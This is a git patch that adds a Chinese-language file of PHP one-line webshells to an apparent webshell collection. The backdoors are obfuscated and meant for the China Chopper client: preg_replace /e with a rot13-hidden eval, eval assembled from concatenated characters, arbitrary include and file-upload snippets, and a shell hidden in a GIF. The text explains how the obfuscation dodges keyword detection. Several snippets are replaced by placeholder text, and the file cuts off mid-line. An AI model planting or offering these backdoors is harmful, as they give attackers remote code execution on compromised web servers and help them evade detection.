From ddfe7283a1ecd19119c407093f92875f8886ba14 Mon Sep 17 00:00:00 2001 From: tennc Date: Fri, 24 May 2013 10:29:06 +0800 Subject: [PATCH] update caidao-shell --- caidao-shell/强悍.php | 53 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 caidao-shell/强悍.php diff --git a/caidao-shell/强悍.php b/caidao-shell/强悍.php new file mode 100644 index 0000000..e796bc6 --- /dev/null +++ b/caidao-shell/强悍.php @@ -0,0 +1,53 @@ +三个变形的一句话PHP木马 +第一个 + 在菜刀里写http://site/1.php?2=assert密码是1 第二个 + + 在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。 第三个 +($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'); str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血! 最后列几个高级的PHP一句话木马后门: +1、 +$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; +$hh("/[discuz]/e",$_POST['h'],"Access"); +//菜刀一句话 +2、 +$filename=$_GET['xbid']; +include ($filename); +//危险的include函数,直接编译任何文件为php格式运行 +3、 +$reg="c"."o"."p"."y"; +$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); +//重命名任何文件 +4、 +$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; +$gzid("/[discuz]/e",$_POST['h'],"Access"); +//菜刀一句话 +5、include ($uid); +//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif +//gif插一句话 +6、典型一句话 +程序后门代码 + +程序代码 + +//容错代码 +程序代码 + +//使用lanker一句话客户端的专家模式执行相关的php语句 +程序代码 + +程序代码 + +程序代码 + +//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 +程序代码 +h=@eval_r($_POST1); +程序代码 + +//绕过